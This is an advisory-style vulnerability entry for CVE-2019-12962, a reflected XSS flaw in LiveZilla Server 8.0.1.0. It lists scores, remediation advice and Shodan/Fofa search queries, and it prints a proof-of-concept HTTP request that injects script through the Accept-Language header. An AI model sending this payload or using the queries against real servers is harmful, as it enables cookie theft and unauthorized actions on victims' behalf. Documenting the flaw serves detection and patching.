| Title | LiveZilla Server 8.0.1.0 - Cross-Site Scripting |
|---|---|
| Author | Clment Cruchet |
| Severity | Medium |
| Impact | Attackers can inject malicious JavaScript through the Accept-Language header, potentially stealing session cookies, credentials, or performing unauthorized actions on behalf of victims. |
| Remediation | Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.06302 |
| CVE ID | CVE-2019-12962 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:LiveZillahttp.html:livezilla |
| Fofa Query | body=livezilla |
| Tags | cve cve2019 xss edb packetstorm livezilla vuln |
LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
GET /mobile/index.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: ;alert(document.domain)//
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-12962.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-12962.pcap
N/AN/A